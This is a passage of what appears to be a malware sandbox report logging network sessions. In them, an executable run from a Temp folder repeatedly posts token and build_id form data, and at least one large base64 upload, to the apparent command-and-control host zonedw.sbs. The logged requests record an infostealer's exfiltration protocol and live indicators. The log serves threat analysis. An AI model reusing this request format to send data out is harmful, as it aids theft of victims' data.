2024-12-13 17:55:26 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 47 56 4b 4e 47 56 33 37 59 35 38 51 39 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 47 56 4b 4e 47 56 33 37 59 35 38 51 39 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 47 56 4b 4e 47 56 33 37 59 35 38 51 39 52 49 0d 0a 43 6f 6e 74 Data Ascii: ------AAA1NGVKNGV37Y58Q9RIContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------AAA1NGVKNGV37Y58Q9RIContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------AAA1NGVKNGV37Y58Q9RICont
2024-12-13 17:55:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:27 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	50135	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:27 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----RIM7GLNG4OZMYMGVK6XL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:27 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 52 49 4d 37 47 4c 4e 47 34 4f 5a 4d 59 4d 47 56 4b 36 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 52 49 4d 37 47 4c 4e 47 34 4f 5a 4d 59 4d 47 56 4b 36 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 52 49 4d 37 47 4c 4e 47 34 4f 5a 4d 59 4d 47 56 4b 36 58 4c 0d 0a 43 6f 6e 74 Data Ascii: ------RIM7GLNG4OZMYMGVK6XLContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------RIM7GLNG4OZMYMGVK6XLContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------RIM7GLNG4OZMYMGVK6XLCont
2024-12-13 17:55:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:28 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	50137	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:29 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----QQI5XT2689RIM7GDJ5PH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:29 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 51 51 49 35 58 54 32 36 38 39 52 49 4d 37 47 44 4a 35 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 35 58 54 32 36 38 39 52 49 4d 37 47 44 4a 35 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 35 58 54 32 36 38 39 52 49 4d 37 47 44 4a 35 50 48 0d 0a 43 6f 6e 74 Data Ascii: ------QQI5XT2689RIM7GDJ5PHContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------QQI5XT2689RIM7GDJ5PHContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------QQI5XT2689RIM7GDJ5PHCont
2024-12-13 17:55:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:30 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	50139	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:30 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----C2VAAIM79H47YMOHD2VS User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:30 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 32 56 41 41 49 4d 37 39 48 34 37 59 4d 4f 48 44 32 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 41 41 49 4d 37 39 48 34 37 59 4d 4f 48 44 32 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 41 41 49 4d 37 39 48 34 37 59 4d 4f 48 44 32 56 53 0d 0a 43 6f 6e 74 Data Ascii: ------C2VAAIM79H47YMOHD2VSContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------C2VAAIM79H47YMOHD2VSContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------C2VAAIM79H47YMOHD2VSCont
2024-12-13 17:55:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:31 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	50140	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:32 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----26FUAA16XLNYMYCBSJW4 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:32 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 36 46 55 41 41 31 36 58 4c 4e 59 4d 59 43 42 53 4a 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 55 41 41 31 36 58 4c 4e 59 4d 59 43 42 53 4a 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 55 41 41 31 36 58 4c 4e 59 4d 59 43 42 53 4a 57 34 0d 0a 43 6f 6e 74 Data Ascii: ------26FUAA16XLNYMYCBSJW4Content-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------26FUAA16XLNYMYCBSJW4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------26FUAA16XLNYMYCBSJW4Cont
2024-12-13 17:55:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	50143	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:35 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----J5P8Q9RIE3WBAI5XBSR1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 98801 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:35 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 Data Ascii: ------J5P8Q9RIE3WBAI5XBSR1Content-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------J5P8Q9RIE3WBAI5XBSR1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------J5P8Q9RIE3WBAI5XBSR1Cont
2024-12-13 17:55:35 UTC	16355	OUT	Data Raw: 6d 57 45 4d 38 52 47 50 4c 4c 45 74 74 2f 44 4f 50 77 71 75 2f 39 64 78 64 6b 5a 76 6a 36 32 53 37 6a 38 50 57 38 6a 79 6f 6b 6d 73 77 71 57 68 6c 61 4e 78 38 72 39 47 55 67 67 2b 34 4e 62 4f 6e 65 48 72 58 54 4c 6e 37 52 44 64 61 6e 4b 32 30 72 74 75 64 52 6e 6e 58 2f 41 4c 35 64 79 4d 2b 2b 4b 6e 31 50 53 4c 66 56 6d 73 57 6e 65 56 54 5a 58 53 58 55 66 6c 6b 44 4c 71 43 41 44 6b 48 6a 6b 2b 6c 58 36 53 30 58 7a 2f 52 44 65 72 2b 58 36 73 38 32 76 30 38 7a 34 58 65 4b 6b 79 56 33 58 39 36 4d 6a 71 50 39 4a 61 74 72 78 7a 62 4e 62 65 43 45 73 4c 4b 4f 4e 59 44 50 61 32 7a 52 73 35 6a 54 79 6a 4b 69 6c 53 77 42 32 71 52 77 54 67 38 45 38 47 74 53 54 77 76 5a 53 36 46 66 36 51 30 74 78 39 6e 76 5a 70 5a 70 47 44 4c 76 44 53 4f 58 4f 44 6a 47 4d 6e 6a 67 38 Data Ascii: mWEM8RGPLLEtt/DOPwqu/9dxdkZvj62S7j8PW8jyokmswqWhlaNx8r9GUgg+4NbOneHrXTLn7RDdanK20rtudRnnX/AL5dyM++Kn1PSLfVmsWneVTZXSXUflkDLqCADkHjk+lX6S0Xz/RDer+X6s82v08z4XeKkyV3X96MjqP9JatrxzbNbeCEsLKONYDPa2zRs5jTyjKilSwB2qRwTg8E8GtSTwvZS6Ff6Q0tx9nvZpZpGDLvDSOXODjGMnjg8
2024-12-13 17:55:35 UTC	16355	OUT	Data Raw: 6d 35 6e 4d 70 6b 73 62 32 46 5a 58 4a 2b 63 2f 4a 74 48 50 4f 64 71 48 72 7a 78 54 53 76 2f 41 46 36 2f 35 41 39 50 36 39 50 38 7a 31 43 69 76 4e 6f 37 4d 2b 49 49 50 46 64 74 59 33 6c 70 75 62 58 31 32 78 7a 74 6d 47 35 4d 63 55 52 61 46 38 63 6c 54 74 49 4f 4d 39 44 77 52 6b 56 51 76 37 69 4b 54 53 62 58 54 74 50 30 57 7a 30 75 33 2f 74 37 37 4a 71 6c 6d 4c 6e 79 37 57 52 78 48 6b 4c 35 69 49 66 33 62 34 6a 42 47 77 5a 50 79 6b 44 4a 79 6c 71 6c 35 32 2f 47 33 2b 59 33 70 66 79 76 2b 46 2f 38 6a 31 69 73 69 2b 31 76 37 48 34 6c 30 6e 52 2f 73 2b 2f 2b 30 45 6e 66 7a 64 2b 50 4c 38 73 4b 65 6d 4f 63 37 76 55 59 78 58 43 36 6c 5a 36 68 6f 47 6b 61 79 50 38 41 69 58 36 54 70 73 38 39 6b 4a 4c 54 54 62 74 33 46 70 47 30 6d 32 61 54 37 69 65 57 47 58 48 51 Data Ascii: m5nMpksb2FZXJ+c/JtHPOdqHrzxTSv/AF6/5A9P69P8z1CivNo7M+IIPFdtY3lpubX12xztmG5McURaF8clTtIOM9DwRkVQv7iKTSbXTtP0Wz0u3/t77JqlmLny7WRxHkL5iIf3b4jBGwZPykDJylql52/G3+Y3pfyv+F/8j1isi+1v7H4l0nR/s+/+0Enfzd+PL8sKemOc7vUYxXC6lZ6hoGkayP8AiX6Tps89kJLTTbt3FpG0m2aT7ieWGXHQ
2024-12-13 17:55:35 UTC	16355	OUT	Data Raw: 56 32 77 30 50 37 44 71 45 64 31 39 6f 33 37 4c 43 4b 79 32 37 4d 5a 32 45 6e 64 6e 50 66 50 54 39 61 58 58 2b 76 50 2f 41 49 41 33 74 70 2f 57 33 2f 42 4b 74 72 34 6f 2b 30 36 64 34 66 75 2f 73 5a 58 2b 32 44 6a 59 4a 4d 2b 56 2b 36 65 54 30 2b 62 37 6d 4f 33 57 70 50 44 4f 76 58 50 69 47 7a 2b 33 47 30 74 59 72 4b 56 64 30 44 77 33 6e 6e 50 31 35 57 52 64 67 43 4f 4f 4d 67 46 73 48 49 7a 78 57 66 5a 2b 44 37 36 31 6c 30 6d 4e 74 62 44 32 57 6b 53 4f 31 70 43 74 6f 46 59 71 59 33 51 43 52 74 78 33 46 51 34 77 51 46 48 42 79 44 6b 45 58 39 47 30 43 34 73 4e 57 75 39 56 76 72 75 32 6e 76 4c 6d 4a 49 70 47 74 62 51 32 36 75 46 7a 68 6e 47 39 74 7a 38 34 7a 6b 59 48 41 46 56 70 63 4a 65 51 6b 66 69 47 65 34 38 53 58 6d 6d 57 39 70 62 47 43 78 5a 56 75 5a 4a Data Ascii: V2w0P7DqEd19o37LCKy27MZ2EndnPfPT9aXX+vP/AIA3tp/W3/BKtr4o+06d4fu/sZX+2DjYJM+V+6eT0+b7mO3WpPDOvXPiGz+3G0tYrKVd0Dw3nnP15WRdgCOOMgFsHIzxWfZ+D761l0mNtbD2WkSO1pCtoFYqY3QCRtx3FQ4wQFHByDkEX9G0C4sNWu9Vvru2nvLmJIpGtbQ26uFzhnG9tz84zkYHAFVpcJeQkfiGe48SXmmW9pbGCxZVuZJ
2024-12-13 17:55:35 UTC	16355	OUT	Data Raw: 48 59 75 70 57 4d 4d 77 33 5a 51 35 78 67 37 4d 45 38 43 6d 31 62 2b 76 36 2f 72 75 4a 61 6f 33 62 6a 56 39 4d 73 37 64 4c 69 36 31 47 30 67 67 6b 54 7a 45 6c 6c 6e 56 56 5a 4f 50 6d 42 4a 77 52 79 4f 66 63 56 5a 74 37 69 47 37 74 34 37 69 32 6d 6a 6d 67 6b 55 4d 6b 6b 62 42 6c 59 48 6f 51 52 77 52 58 45 61 50 6f 73 38 57 70 65 48 35 4c 6a 54 32 53 4b 47 54 55 4c 69 4a 47 6a 79 4c 56 5a 48 42 6a 55 34 34 56 74 72 45 59 37 63 6a 74 57 31 34 51 74 37 69 7a 30 4b 34 68 6c 74 33 68 4b 58 31 32 59 6f 33 54 5a 38 68 6d 63 72 67 65 68 42 47 50 59 30 67 4e 4f 31 31 72 53 72 36 39 6d 73 72 54 55 37 4b 34 75 34 63 2b 62 42 44 63 4b 37 78 34 4f 44 75 55 48 49 77 65 4f 61 6c 76 74 51 73 74 4d 74 54 63 36 68 65 57 39 70 62 71 51 44 4c 63 53 72 47 67 4a 36 63 6b 34 72 Data Ascii: HYupWMMw3ZQ5xg7ME8Cm1b+v6/ruJao3bjV9Ms7dLi61G0ggkTzEllnVVZOPmBJwRyOfcVZt7iG7t47i2mjmgkUMkkbBlYHoQRwRXEaPos8WpeH5LjT2SKGTULiJGjyLVZHBjU44VtrEY7cjtW14Qt7iz0K4hlt3hKX12Yo3TZ8hmcrgehBGPY0gNO11rSr69msrTU7K4u4c+bBDcK7x4ODuUHIweOalvtQstMtTc6heW9pbqQDLcSrGgJ6ck4r
2024-12-13 17:55:35 UTC	16355	OUT	Data Raw: 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 Data Ascii: RQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABR
2024-12-13 17:55:35 UTC	671	OUT	Data Raw: 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b Data Ascii: ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
2024-12-13 17:55:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	50146	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:39 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----V3WLNGD26F3EU3W4O8GV User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:39 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 Data Ascii: ------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------V3WLNGD26F3EU3W4O8GVCont
2024-12-13 17:55:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	50147	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:41 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----WL6PZMY5PH4EUAAI58YM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:41 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 4c 36 50 5a 4d 59 35 50 48 34 45 55 41 41 49 35 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 50 5a 4d 59 35 50 48 34 45 55 41 41 49 35 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 50 5a 4d 59 35 50 48 34 45 55 41 41 49 35 38 59 4d 0d 0a 43 6f 6e 74 Data Ascii: ------WL6PZMY5PH4EUAAI58YMContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------WL6PZMY5PH4EUAAI58YMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------WL6PZMY5PH4EUAAI58YMCont
2024-12-13 17:55:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:55:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
